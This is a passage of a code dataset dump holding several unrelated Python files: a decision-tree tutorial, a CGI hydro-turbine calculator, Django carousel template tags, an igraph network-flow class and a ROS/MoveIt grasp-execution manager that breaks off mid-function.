gain\n\t\t\tbestFeature = i #record the index of the feature with the largest gain\n\treturn bestFeature #return the index of the feature with the largest information gain\n\n\n\"\"\"\nFunction: find the element (class label) that occurs most often in classList\n\nParameters:\n\tclassList - list of class labels\nReturns:\n\tsortedClassCount[0][0] - the most frequent element (class label)\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-24\n\"\"\"\ndef majorityCnt(classList):\n\tclassCount = {}\n\tfor vote in classList: #count how often each element occurs in classList\n\t\tif vote not in classCount.keys():classCount[vote] = 0 \n\t\tclassCount[vote] += 1\n\tsortedClassCount = sorted(classCount.items(), key = operator.itemgetter(1), reverse = True) #sort by dict value, descending\n\treturn sortedClassCount[0][0] #return the most frequent element of classList\n\n\"\"\"\nFunction: build the decision tree\n\nParameters:\n\tdataSet - the training data set\n\tlabels - the feature labels\n\tfeatLabels - stores the selected optimal feature labels\nReturns:\n\tmyTree - the decision tree\nAuthor:\n\tJack Cui\nBlog:\n\thttp://blog.csdn.net/c406495762\nModify:\n\t2017-07-25\n\"\"\"\ndef createTree(dataSet, labels, featLabels):\n\tclassList = [example[-1] for example in dataSet]\n\tprint('classList\\t', classList ) #class labels (grant the loan: yes or no)\n\tif classList.count(classList[0]) == len(classList):\n\t\tprint(\"stop splitting once all classes are identical\") #stop splitting once all classes are identical\n\t\treturn classList[0]\n\tif len(dataSet[0]) == 1: \n\t\tprint(\"all features traversed: return the most common class label\") #all features traversed: return the most common class label\n\t\treturn majorityCnt(classList)\n\tbestFeat = chooseBestFeatureToSplit(dataSet) \n\tprint(\"bestFeat\\t\", bestFeat) #choose the optimal feature\n\tbestFeatLabel = labels[bestFeat]\n\tprint('bestFeatLabel\\t', bestFeatLabel) #label of the optimal feature\n\tfeatLabels.append(bestFeatLabel)\n\tprint('featLabels\\t', featLabels)\n\tmyTree = {bestFeatLabel:{}} \n\tprint('myTree\\t', myTree) #grow the tree keyed on the optimal feature's label\n\tdel(labels[bestFeat]) \n\tprint('labels\\t', labels) #delete the used feature label\n\tfeatValues = [example[bestFeat] for example in dataSet]\n\tprint('featValues\\t', featValues) #collect all values of the optimal feature in the training set\n\tuniqueVals = set(featValues)\n\tprint('uniqueVals\\t', uniqueVals) #drop duplicate values\n\tfor value in uniqueVals: #iterate over the values, building subtrees. \n\t\tmyTree[bestFeatLabel][value] = createTree(splitDataSet(dataSet, bestFeat, value), 
labels, featLabels)\n\treturn myTree\n\nif __name__ == '__main__':\n\tdataSet, labels = createDataSet()\n\tfeatLabels = []\n\tmyTree = createTree(dataSet, labels, featLabels)\n\tprint(myTree)","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":7433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"50051824","text":"#!/usr/bin/python\r\n\r\nimport sys\r\nimport cgi\r\nimport re\r\nimport LH_Maths_20170418_R09\r\nfrom LH_Maths_20170418_R09 import siteGUI\r\nfrom LH_Maths_20170418_R09 import process_here\r\n\r\n\r\ndef fetchHTTP_data():\r\n form = cgi.FieldStorage()\r\n siteGUI.GUI_LHtype = str('LH/LH Pro')\r\n if (form.getvalue('initial_data')): siteGUI.GUI_initial_data = int(form.getvalue('initial_data'))\r\n if (form.getvalue('process_option')): siteGUI.GUI_process_option = str(form.getvalue('process_option'))\r\n if (form.getvalue('meas_sys')): siteGUI.GUI_meas_sys = str(form.getvalue('meas_sys'))\r\n if (form.getvalue('avail_lps')): siteGUI.GUI_avail_lps = str(form.getvalue('avail_lps'))\r\n if (form.getvalue('pipe_head')): siteGUI.GUI_pipe_head = str(form.getvalue('pipe_head'))\r\n if (form.getvalue('pipe_len')): siteGUI.GUI_pipe_len = str(form.getvalue('pipe_len'))\r\n if (form.getvalue('PipeFlume')): siteGUI.GUI_PipeFlume = str(form.getvalue('PipeFlume'))\r\n if (form.getvalue('pipe_mat')): siteGUI.GUI_pipe_mat = str(form.getvalue('pipe_mat'))\r\n if (form.getvalue('pipe_dia')): siteGUI.GUI_pipe_dia = str(form.getvalue('pipe_dia'))\r\n if (form.getvalue('pipe_height')): siteGUI.GUI_pipe_height = str(form.getvalue('pipe_height'))\r\n if (form.getvalue('LH_head')): siteGUI.GUI_LH_head = str(form.getvalue('LH_head'))\r\n if (form.getvalue('Num_LH')): siteGUI.GUI_Num_LH = str(form.getvalue('Num_LH'))\r\n if (form.getvalue('LockNumLH')): siteGUI.GUI_LockNumLH = int(form.getvalue('LockNumLH'))\r\n if (form.getvalue('cable_eff_target')): siteGUI.GUI_cable_eff_target = str(form.getvalue('cable_eff_target'))\r\n if (form.getvalue('cable_len')): siteGUI.GUI_cable_len = str(form.getvalue('cable_len'))\r\n if (form.getvalue('Load_Vmax')): siteGUI.GUI_Load_Vmax = str(form.getvalue('Load_Vmax'))\r\n # else:siteGUI.GUI_Load_Vmax =str('150 V')\r\n if (form.getvalue('Load_Vmin')): siteGUI.GUI_Load_Vmin = str(form.getvalue('Load_Vmin'))\r\n if (form.getvalue('LockCable')): siteGUI.GUI_LockCable = int(form.getvalue('LockCable'))\r\n if (form.getvalue('cable_material')): siteGUI.GUI_cable_material = str(form.getvalue('cable_material'))\r\n if (form.getvalue('cable_size')): siteGUI.GUI_cable_size = str(form.getvalue('cable_size'))\r\n if (form.getvalue('cable_AWG')): siteGUI.GUI_cable_AWG = str(form.getvalue('cable_AWG'))\r\n\r\n\r\ndef putHTTP_data():\r\n response = \"{\"\r\n response += \"\\\"initial_data\\\" : \\\"\" + str(siteGUI.GUI_initial_data) + \"\\\", \"\r\n response += \"\\\"meas_sys\\\" : \\\"\" + str(siteGUI.GUI_meas_sys) + \"\\\", \"\r\n response += \"\\\"LHtype\\\" : \\\"\" + str(siteGUI.GUI_LHtype) + \"\\\", \"\r\n response += \"\\\"avail_lps\\\" : \\\"\" + str(siteGUI.GUI_avail_lps) + \"\\\", \"\r\n response += \"\\\"pipe_mat\\\" : \\\"\" + str(siteGUI.GUI_pipe_mat) + \"\\\", \"\r\n response += \"\\\"pipe_head\\\" : \\\"\" + str(siteGUI.GUI_pipe_head) + \"\\\", \"\r\n response += \"\\\"pipe_len\\\" : \\\"\" + str(siteGUI.GUI_pipe_len) + \"\\\", \"\r\n response += \"\\\"PipeFlume\\\" : \\\"\" + str(siteGUI.GUI_PipeFlume) + \"\\\", \"\r\n response += \"\\\"pipe_dia\\\" : \\\"\" + str(siteGUI.GUI_pipe_dia) + 
\"\\\", \"\r\n response += \"\\\"pipe_height\\\" : \\\"\" + str(siteGUI.GUI_pipe_height) + \"\\\", \"\r\n response += \"\\\"LH_head\\\" : \\\"\" + str(siteGUI.GUI_LH_head) + \"\\\", \"\r\n response += \"\\\"Num_LH\\\" : \\\"\" + str(siteGUI.GUI_Num_LH) + \"\\\", \"\r\n response += \"\\\"LockNumLH\\\" : \\\"\" + str(siteGUI.GUI_LockNumLH) + \"\\\", \"\r\n response += \"\\\"cable_eff_target\\\" : \\\"\" + str(siteGUI.GUI_cable_eff_target) + \"\\\", \"\r\n response += \"\\\"cable_len\\\" : \\\"\" + str(siteGUI.GUI_cable_len) + \"\\\", \"\r\n response += \"\\\"Load_Vmax\\\" : \\\"\" + str(siteGUI.GUI_Load_Vmax) + \"\\\", \"\r\n response += \"\\\"Load_Vmin\\\" : \\\"\" + str(siteGUI.GUI_Load_Vmin) + \"\\\", \"\r\n response += \"\\\"LockCable\\\" : \\\"\" + str(siteGUI.GUI_LockCable) + \"\\\", \"\r\n response += \"\\\"cable_material\\\" : \\\"\" + str(siteGUI.GUI_cable_material) + \"\\\", \"\r\n response += \"\\\"cable_size\\\" : \\\"\" + str(siteGUI.GUI_cable_size) + \"\\\", \"\r\n response += \"\\\"cable_AWG\\\" : \\\"\" + str(siteGUI.GUI_cable_AWG) + \"\\\", \"\r\n response += \"\\\"actual_lps\\\" : \\\"\" + str(siteGUI.GUI_actual_lps) + \"\\\", \"\r\n response += \"\\\"water_depth\\\" : \\\"\" + str(siteGUI.GUI_water_depth) + \"\\\", \"\r\n response += \"\\\"LH_Draft_T\\\" : \\\"\" + str(siteGUI.GUI_LH_Draft_T) + \"\\\", \"\r\n response += \"\\\"pipe_capacity\\\" : \\\"\" + str(siteGUI.GUI_pipe_capacity) + \"\\\", \"\r\n response += \"\\\"LH_rpm_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_rpm_Opr) + \"\\\", \"\r\n response += \"\\\"LH_rpm_NL\\\" : \\\"\" + str(siteGUI.GUI_LH_rpm_NL) + \"\\\", \"\r\n response += \"\\\"LH_watts_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_watts_Opr) + \"\\\", \"\r\n response += \"\\\"LH_pwr_tot\\\" : \\\"\" + str(siteGUI.GUI_LH_pwr_tot) + \"\\\", \"\r\n response += \"\\\"LH_V_Opr\\\" : \\\"\" + str(siteGUI.GUI_LH_V_Opr) + \"\\\", \"\r\n response += \"\\\"LH_V_NL\\\" : \\\"\" + str(siteGUI.GUI_LH_V_NL) + \"\\\", \"\r\n response += \"\\\"Aload_V\\\" : \\\"\" + str(siteGUI.GUI_Aload_V) + \"\\\", \"\r\n response += \"\\\"cable_mm_title\\\" : \\\"\" + str(siteGUI.GUI_cable_mm_title) + \"\\\", \"\r\n response += \"\\\"cable_AWG_title\\\" : \\\"\" + str(siteGUI.GUI_cable_AWG_title) + \"\\\", \"\r\n response += \"\\\"cable_dia_mm_sld\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_mm_sld) + \"\\\", \"\r\n response += \"\\\"cable_dia_mm_str\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_mm_str) + \"\\\", \"\r\n response += \"\\\"cable_dia_in_sld\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_in_sld) + \"\\\", \"\r\n response += \"\\\"cable_dia_in_str\\\" : \\\"\" + str(siteGUI.GUI_cable_dia_in_str) + \"\\\", \"\r\n response += \"\\\"cable_A\\\" : \\\"\" + str(siteGUI.GUI_cable_A) + \"\\\", \"\r\n response += \"\\\"actual_cable_eff\\\" : \\\"\" + str(siteGUI.GUI_actual_cable_eff) + \"\\\", \"\r\n response += \"\\\"Load_pwr\\\" : \\\"\" + str(siteGUI.GUI_Load_pwr) + \"\\\", \"\r\n response += \"\\\"design_notes_hydro\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_hydro) + \"\\\", \"\r\n response += \"\\\"design_notes_elec\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_elec) + \"\\\", \"\r\n response += \"\\\"design_notes_safety\\\" : \\\"\" + re.sub('\\s{2,}|\\r|\\n', ' ', siteGUI.GUI_design_notes_safety) + \"\\\"\"\r\n response += \"}\"\r\n\r\n return response\r\n\r\n\r\nprint(\"Content-Type: 
text/plain\\n\")\r\nfetchHTTP_data()\r\nprocess_here()\r\nprint(putHTTP_data());\r\n","sub_path":"flaskCalculator_V3/LH_HTTP.py","file_name":"LH_HTTP.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"471506045","text":"from django import template\n\nimport six\n\nfrom ..models import Carousel\n\n\nregister = template.Library()\n\nDEFAULT_TEMPLATE_NAMES = ['carousel/templatetags/carousel.html']\n\n\ndef render_carousel(context, template_name):\n template_names = get_template_names(template_name=template_name)\n return template.loader.render_to_string(template_names, context)\n\n\ndef get_template_names(template_name):\n template_names = DEFAULT_TEMPLATE_NAMES\n if template_name:\n template_names.insert(0, template_name)\n return template_names\n\n\n@register.simple_tag(takes_context=True)\ndef carousel(context, carousel, template_name=None):\n if isinstance(carousel, six.string_types):\n return carousel_with_name(context, name=carousel, template_name=template_name)\n context['carousel'] = carousel\n return render_carousel(context, template_name)\n\n\n@register.simple_tag(takes_context=True)\ndef carousel_with_name(context, name, template_name=None):\n try:\n context['carousel'] = Carousel.objects.get(name=name)\n return render_carousel(context, template_name)\n except Carousel.DoesNotExist:\n return ''\n\n\n@register.simple_tag(takes_context=True)\ndef carousel_with_id(context, id, template_name=None):\n try:\n context['carousel'] = Carousel.objects.get(id=id)\n return render_carousel(context, template_name)\n except Carousel.DoesNotExist:\n return ''\n","sub_path":"carousel/templatetags/carousel_tags.py","file_name":"carousel_tags.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"303480338","text":"\"\"\"\nEncapsulating class for Network object.\nProvides graph-specific functionality to support routing.\n\"\"\"\n\nfrom datetime import timedelta\nfrom igraph import *\nimport itertools\nimport sys\n\nfrom graphviz import Digraph\nimport network\nfrom yen_k_shortest_paths import *\nfrom debug import dprint\nfrom exceptions import *\n\n\nMAX_INT = sys.maxsize\n\n\nNG_DEBUG = True\n\n\ndef ng_dprint(fmt, args=None):\n if NG_DEBUG:\n if args is not None:\n dprint(fmt % args)\n else:\n dprint(fmt)\n\n\nclass Path(object):\n \"\"\"\n A representation of a path in the graph and it properties.\n \"\"\"\n def __init__(self, G, edges, rank):\n \"\"\"\n build a path object given the list of edge objects in paths.\n the path belongs to the graph G.\n \"\"\"\n self.G = G\n self.rank = rank # this path's position in the context of the k-shortest paths it belongs to.\n self.edges = edges\n self.start = edges[0].source\n self.end = edges[-1].target\n self.packages = []\n\n def __str__(self):\n start_statid = self.G.vs[self.start][\"statid\"]\n end_statid = self.G.vs[self.end][\"statid\"]\n string = \"%d>>%d--(%d) ------------------------------------\\n\" % \\\n (start_statid, end_statid, self.rank, )\n for edge in self.edges:\n s_statid = self.G.vs[edge.source][\"statid\"]\n t_statid = self.G.vs[edge.target][\"statid\"]\n string += \" %d-->%d: \" % (s_statid, t_statid)\n string += \"SR: %s \" % edge[\"SR\"]\n string += \"flow: %d/%d \" % (edge[\"flow\"], edge[\"capacity\"])\n string += \"assigned: %d/%d \\n\" % (edge[\"assigned\"], edge[\"flow\"])\n\n string += \"total time: \" + str(self.latency()) + \"\\n\"\n 
string += \"--------------------------------------------\\n\"\n return string\n\n def edges(self):\n return self.edges\n\n def latency(self):\n \"\"\"\n Return the amount of time in minutes and seconds it would take to\n traverse the path.\n \"\"\"\n lat = 0.0\n for e in self.edges:\n lat += float(e[\"latency\"])\n\n return timedelta(seconds=lat)\n\n def use(self, pid):\n \"\"\"\n Assign package with package id pid to this path.\n If doing so will violate one of this path's edges, throw a PathFull exception\n and leave the path unchanged.\n \"\"\"\n for edge in self.edges:\n edge[\"assigned\"] += 1\n if edge[\"assigned\"] > edge[\"flow\"]:\n # clean up and raise PathFull exception.\n for e in self.edges:\n e[\"assigned\"] -= 1\n if e == edge:\n break\n raise PathFull\n\n # all is well if we got here\n self.packages.append(pid)\n\n def validate(self, s, t):\n \"\"\"\n confirm that this path actually goes from s to t\n \"\"\"\n if s != self.start or t != self.end:\n raise InconsistentPath(self)\n\n\nclass NetGraph(network.Network):\n def __init__(self, graphtype=\"network\"):\n self.G = Graph(directed=True)\n if graphtype == \"simple\":\n self.__build_simple()\n elif graphtype == \"network\":\n super(NetGraph, self).__init__()\n self.__build_network()\n\n def __build_simple(self):\n \"\"\"\n build a simple small graph for correctness testing.\n 1 -> 2 , cap = 3\n 1 -> 6 , cap = 3\n 2 -> 3 , cap = 3\n 2 -> 6 , cap = 2\n 3 -> 4 , cap = 2\n 3 -> 5 , cap = 4\n 5 -> 4 , cap = 3\n 6 -> 5 , cap = 2\n \"\"\"\n\n # vertices: 0-6\n for i in range(7):\n self.G.add_vertex(statid=i)\n\n self.G.add_edge(1, 2, statid=0, SR=\"sr0\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(1, 6, statid=2, SR=\"sr2\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(2, 3, statid=3, SR=\"sr3\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(2, 6, statid=4, SR=\"sr4\", latency=1, capacity=2, flow=0, assigned=0)\n self.G.add_edge(3, 4, statid=5, SR=\"sr5\", latency=1, capacity=2, flow=0, assigned=0)\n self.G.add_edge(3, 5, statid=6, SR=\"sr6\", latency=1, capacity=4, flow=0, assigned=0)\n self.G.add_edge(5, 4, statid=7, SR=\"sr7\", latency=1, capacity=3, flow=0, assigned=0)\n self.G.add_edge(6, 5, statid=8, SR=\"sr8\", latency=1, capacity=2, flow=0, assigned=0)\n\n def __build_network(self):\n \"\"\"\n Build a graph representation of this network.\n :rtype : Graph\n \"\"\"\n\n # Add vertices.\n # don't add stops that have no adjacent.\n stops = []\n for i, stop in enumerate(self.getStops()):\n o_stop = self.getStop(stop)\n if o_stop.has_adjacent():\n self.G.add_vertex(name=o_stop.stopid, statid=o_stop.intid)\n stops.append(o_stop)\n\n # Add edges.\n edgeid = 0\n for o_stop1 in stops:\n\n # Adjacency on trip.\n vert1 = self.vertex(statid=o_stop1.intid)\n for o_stop2, o_trip in o_stop1.adjacent(self):\n\n # check sanity. 
o_stop2 should have been added to the graph.\n                if NG_DEBUG and o_stop2 not in stops:\n                    ng_dprint(\"__build_network(): insanity!\")\n\n                lat = o_trip.getLatency(o_stop1.stopid, o_stop2.stopid)\n                if lat != float(\"inf\"):\n                    cap = o_trip.getCapacity()\n                    vert2 = self.vertex(statid=o_stop2.intid)\n                    self.G.add_edge(vert1,\n                                    vert2,\n                                    statid=edgeid,\n                                    SR=o_trip.tripid,\n                                    latency=lat,\n                                    capacity=cap,\n                                    flow=0,\n                                    assigned=0)\n                    edgeid += 1\n\n    def edge(self, statid):\n        # Get the edge with static id statid, or None if it does not exist.\n        es = self.G.es.select(statid=statid)\n        if len(es) > 0:\n            return es[0]\n        else:\n            return None\n\n    def edges(self):\n        \"\"\"\n        Return a dict {statid: edge}\n        \"\"\"\n        e_dict = {}\n        for e in self.G.es:\n            e_dict[e[\"statid\"]] = e\n\n        return e_dict\n\n    def n_edges(self):\n        return len(self.G.es)\n\n    def vertex(self, nm=None, statid=None):\n        if nm is not None:\n            return self.G.vs.select(name=nm)[0]\n        elif statid is not None:\n            try:\n                return self.G.vs.select(statid=statid)[0]\n            except IndexError:\n                for v in self.G.vs:\n                    dprint(v)\n\n    def vertices(self):\n        return (v for v in self.G.vs)\n\n    def n_vertices(self):\n        \"\"\"\n        Return the number of vertices in this graph\n        \"\"\"\n        return len(self.G.vs)\n\n    def max_flow(self, candidates):\n        \"\"\"\n        candidates is a list of tuples (source, sink) where source and sink are statids\n        of vertices to use. Compute multiple-source multiple-sink maximum flow for the\n        sources and sinks given, update all edges with flow info, and return the total\n        max-flow value.\n        \"\"\"\n\n        D_SRC = MAX_INT\n        D_SNK = D_SRC - 1\n        INF_CAPACITY = 10000  # cannot use MAX_INT, will overflow in the supporting c library.\n\n        # add dummy vertices and edges connecting all sources and another\n        # set for sinks.\n        self.G.add_vertex(statid=D_SRC)\n        self.G.add_vertex(statid=D_SNK)\n        dummy_source = self.vertex(statid=D_SRC).index\n        dummy_sink = self.vertex(statid=D_SNK).index\n\n        # get vertex indices and remove duplicate requests\n        s_indices = set()\n        t_indices = set()\n        for s_id, t_id in candidates:\n            s_index = self.vertex(statid=s_id).index\n            t_index = self.vertex(statid=t_id).index\n            s_indices.add(s_index)\n            t_indices.add(t_index)\n\n        # add dummy edges; iterate sources and sinks separately, since zipping\n        # them would yield None fill values whenever the two sets differ in size.\n        for source in s_indices:\n            self.G.add_edge(dummy_source, source, name=\"dummy_edge\", capacity=INF_CAPACITY)\n        for sink in t_indices:\n            self.G.add_edge(sink, dummy_sink, name=\"dummy_edge\", capacity=INF_CAPACITY)\n\n        # get max flow between dummy vertices.\n        mf = self.G.maxflow(dummy_source, dummy_sink, capacity=\"capacity\")\n\n        # update edge results.\n        for edge in self.G.es:\n            edge[\"flow\"] = mf.flow[edge.index]\n\n        # done with dummies. remove them.\n        # NB: This call deletes the dummy edges too.\n        self.G.delete_vertices([dummy_source, dummy_sink])\n        return mf.value\n
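\n    # A hypothetical usage sketch of max_flow (the statids are illustrative, not taken from real data):\n    #     ng = NetGraph(\"simple\")\n    #     value = ng.max_flow([(1, 4), (2, 5)])   # route from sources 1 and 2 to sinks 4 and 5\n    #     print(value)                            # total flow pushed through the dummy terminals\n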
\n    def view(self, filename=\"diagrams/flow.gv\", label=\"flow\"):\n        \"\"\"\n        View the graph with flow/capacity (or the static edge id) on each edge.\n        \"\"\"\n        dg = Digraph()\n        for v in self.vertices():\n            v_statid = v[\"statid\"]\n            dg.node(str(v_statid))\n        for e in self.G.es:\n            # use a separate variable for the per-edge text so the label mode\n            # is not clobbered after the first edge\n            if label == \"edgeid\":\n                e_label = \"%d\" % (e[\"statid\"])\n            else:\n                e_label = \"%d/%d\" % (e[\"flow\"], e[\"capacity\"])\n\n            s_statid = self.G.vs[e.source][\"statid\"]\n            t_statid = self.G.vs[e.target][\"statid\"]\n            dg.edge(str(s_statid), str(t_statid), xlabel=e_label)\n\n        dg.render(filename=filename, view=False)\n\n    def k_shortest_paths(self, s_statid, t_statid, k):\n        \"\"\"\n        Return a list of k shortest Path objects from source to target.\n        Shortest is defined in terms of latency.\n        \"\"\"\n\n        # get indices.\n        s_index = self.vertex(statid=s_statid).index\n        t_index = self.vertex(statid=t_statid).index\n        paths, costs = yen_k_shortest_paths(self.G, s_index, t_index, k, \"latency\")\n        path_list = []\n        rank = 0\n        for path, cost in itertools.zip_longest(paths, costs):\n            edges = []\n            for statid in path:\n                edges.append(self.edge(statid))\n            if len(edges) > 0:\n                o_path = Path(self.G, edges, rank)\n                # check sanity\n                if NG_DEBUG:\n                    o_path.validate(s_index, t_index)\n\n                path_list.append(o_path)\n                rank += 1\n\n        return path_list\n\n    def __str__(self):\n        \"\"\"\n        Return a string representation of this graph.\n        \"\"\"\n        gs = GraphSummary(self.G,\n                          verbosity=1,\n                          edge_list_format='auto',\n                          print_edge_attributes=False)\n\n        return str(gs)","sub_path":"netgraph.py","file_name":"netgraph.py","file_ext":"py","file_size_in_byte":10633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"521828711","text":"#!/usr/bin/env python\n\nimport rospy\nimport graspit_msgs.msg\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nimport block_recognition.msg\nimport typing\n\nimport sys\nimport moveit_commander\nimport actionlib\nimport graspit_moveit_controller\nimport world_manager\nimport tf\nimport tf_conversions.posemath as pm\n\n\nclass CRUIManager(object):\n\n    def __init__(self):\n\n        rospy.init_node('cruimanager')\n        moveit_commander.roscpp_initialize(sys.argv)\n\n        # Pull all params off param server\n        self.analyze_grasp_topic = rospy.get_param(\"analyze_grasp_topic\")\n        self.execute_grasp_topic = rospy.get_param(\"execute_grasp_topic\")\n        self.run_recognition_topic = rospy.get_param(\"run_recognition_topic\")\n        self.grasp_approach_tran_frame = rospy.get_param(\"grasp_approach_tran_frame\")\n        self.world_frame = rospy.get_param(\"world_frame\")\n        self.arm_move_group_name = rospy.get_param(\"arm_move_group_name\")\n        self.gripper_move_group_name = rospy.get_param(\"gripper_move_group_name\")\n\n        self.analyzer_planner_id = rospy.get_param(\"analyzer_planner_id\")\n        self.executor_planner_id = rospy.get_param(\"executor_planner_id\")\n        self.allowed_analyzing_time = rospy.get_param(\"allowed_analyzing_time\")\n        self.allowed_execution_time = rospy.get_param(\"allowed_execution_time\")\n\n        self.grasping_controller = graspit_moveit_controller.MoveitPickPlaceInterface(\n            arm_name=self.arm_move_group_name,\n            gripper_name=self.gripper_move_group_name,\n            grasp_approach_tran_frame=self.grasp_approach_tran_frame,\n            analyzer_planner_id=self.analyzer_planner_id,\n            execution_planner_id=self.executor_planner_id,\n            allowed_analyzing_time=self.allowed_analyzing_time,\n            allowed_execution_time=self.allowed_execution_time
)\n\n self.scene = moveit_commander.PlanningSceneInterface()\n self.block_recognition_client = block_recognition.BlockRecognitionClient()\n self.world_manager_client = world_manager.world_manager_client.WorldManagerClient()\n self.tf_listener = tf.TransformListener()\n\n # Start grasp analyzer action server\n self._analyze_grasp_as = actionlib.SimpleActionServer(self.analyze_grasp_topic,\n graspit_msgs.msg.CheckGraspReachabilityAction,\n execute_cb=self._analyze_grasp_reachability_cb,\n auto_start=False)\n self._analyze_grasp_as.start()\n\n # Start grasp execution action server\n self._execute_grasp_as = actionlib.SimpleActionServer(self.execute_grasp_topic,\n graspit_msgs.msg.GraspExecutionAction,\n execute_cb=self._execute_grasp_cb,\n auto_start=False)\n self._execute_grasp_as.start()\n\n # Start object recognition action server\n self._run_recognition_as = actionlib.SimpleActionServer(self.run_recognition_topic,\n graspit_msgs.msg.RunObjectRecognitionAction,\n execute_cb=self._run_recognition_cb,\n auto_start=False)\n self._run_recognition_as.start()\n\n rospy.loginfo(self.__class__.__name__ + \" is inited\")\n\n def _graspit_grasp_to_moveit_grasp(self, graspit_grasp):\n # type: (graspit_msgs.msg.Grasp) -> moveit_msgs.msg.Grasp\n\n pre_grasp_approach_direction = geometry_msgs.msg.Vector3Stamped()\n pre_grasp_approach_direction.header.frame_id = rospy.get_param(\"pre_grasp_approach_direction_frame_id\")\n pre_grasp_approach_direction.vector.x = rospy.get_param(\"pre_grasp_approach_direction_x\")\n pre_grasp_approach_direction.vector.y = rospy.get_param(\"pre_grasp_approach_direction_y\")\n pre_grasp_approach_direction.vector.z = rospy.get_param(\"pre_grasp_approach_direction_z\")\n\n post_grasp_retreat_direction = geometry_msgs.msg.Vector3Stamped()\n post_grasp_retreat_direction.header.frame_id = rospy.get_param(\"post_grasp_retreat_direction_frame_id\")\n post_grasp_retreat_direction.vector.x = rospy.get_param(\"post_grasp_retreat_direction_x\")\n post_grasp_retreat_direction.vector.y = rospy.get_param(\"post_grasp_retreat_direction_y\")\n post_grasp_retreat_direction.vector.z = rospy.get_param(\"post_grasp_retreat_direction_z\")\n\n moveit_grasp_msg = graspit_moveit_controller.graspit_grasp_to_moveit_grasp(\n graspit_grasp_msg=graspit_grasp,\n listener=self.tf_listener,\n grasp_tran_frame_name=self.grasp_approach_tran_frame,\n end_effector_link=self.grasping_controller.get_end_effector_link(),\n\n pre_grasp_goal_point_effort=rospy.get_param(\"pre_grasp_goal_point_effort\"),\n pre_grasp_goal_point_positions=rospy.get_param(\"pre_grasp_goal_point_positions\"),\n pre_grasp_goal_point_time_from_start_secs=rospy.get_param(\"pre_grasp_goal_point_time_from_start_secs\"),\n pre_grasp_joint_names=rospy.get_param(\"pre_grasp_joint_names\"),\n\n grasp_goal_point_effort=rospy.get_param(\"grasp_goal_point_effort\"),\n grasp_goal_point_positions=rospy.get_param(\"grasp_goal_point_positions\"),\n grasp_goal_point_time_from_start_secs=rospy.get_param(\"grasp_goal_point_time_from_start_secs\"),\n\n grasp_posture_joint_names=rospy.get_param(\"grasp_posture_joint_names\"),\n\n pre_grasp_approach_min_distance=rospy.get_param(\"pre_grasp_approach_min_distance\"),\n pre_grasp_approach_desired_distance=rospy.get_param(\"pre_grasp_approach_desired_distance\"),\n pre_grasp_approach_direction=pre_grasp_approach_direction,\n\n post_grasp_retreat_min_distance=rospy.get_param(\"post_grasp_retreat_min_distance\"),\n post_grasp_retreat_desired_distance=rospy.get_param(\"post_grasp_retreat_desired_distance\"),\n 
post_grasp_retreat_direction=post_grasp_retreat_direction,\n\n            max_contact_force=rospy.get_param(\"max_contact_force\")\n        )\n\n        return moveit_grasp_msg\n\n    def _analyze_grasp_reachability_cb(self, goal):\n        # type: (graspit_msgs.msg.CheckGraspReachabilityGoal) -> graspit_msgs.msg.CheckGraspReachabilityResult\n        \"\"\"\n        @return: Whether the grasp is expected to succeed\n        \"\"\"\n        # Convert graspit grasp to moveit grasp\n        rospy.loginfo(\"Analyzing grasp for object: {}\".format(goal.grasp.object_name))\n\n        block_names = self.scene.get_attached_objects().keys()\n        self.grasping_controller.detach_all_blocks(block_names)\n\n        moveit_grasp_msg = self._graspit_grasp_to_moveit_grasp(goal.grasp)\n        success, pick_result = self.grasping_controller.analyze_moveit_grasp(goal.grasp.object_name, moveit_grasp_msg)\n\n        result = graspit_msgs.msg.CheckGraspReachabilityResult()\n        result.isPossible = success\n        result.grasp_id = goal.grasp.grasp_id\n\n        rospy.loginfo(\"Able to execute grasp with grasp id {} after analysis: {}\".format(goal.grasp.grasp_id, success))\n        self._analyze_grasp_as.set_succeeded(result)\n\n        return []\n\n    def _execute_grasp_cb(self, goal):\n        # type: (graspit_msgs.msg.GraspExecutionGoal) -> graspit_msgs.msg.GraspExecutionResult\n        rospy.loginfo(\"Executing grasp goal\")\n        result = graspit_msgs.msg.GraspExecutionResult()\n        result.success = False\n\n        block_names = self.scene.get_attached_objects().keys()\n        self.grasping_controller.detach_all_blocks(block_names)\n\n        # Acquire block position for place\n        objects = self.scene.get_object_poses([goal.grasp.object_name])\n        if goal.grasp.object_name not in objects:\n            rospy.logerr(\"Object {} not in planning scene. Execute grasp failed\".format(goal.grasp.object_name))\n            self._execute_grasp_as.set_aborted(result)\n            return []\n\n        block_pose_stamped = geometry_msgs.msg.PoseStamped()\n        block_pose_stamped.pose = objects[goal.grasp.object_name]\n        block_pose_stamped.header.frame_id = self.grasping_controller.get_planning_frame()\n\n        rospy.loginfo(\"Object {} in planning scene. Pose: {}\".format(goal.grasp.object_name, block_pose_stamped.pose))\n\n        # Shift block pose to place location in param server\n        block_pose_stamped.pose.position.x = rospy.get_param(\"final_block_position_x\")\n        block_pose_stamped.pose.position.y = rospy.get_param(\"final_block_position_y\")\n        block_pose_stamped.pose.position.z = rospy.get_param(\"final_block_position_z\")\n\n        rospy.loginfo(\"Placing block at position ({}, {}, {})\"\n                      .format(block_pose_stamped.pose.position.x,\n                              block_pose_stamped.pose.position.y,\n                              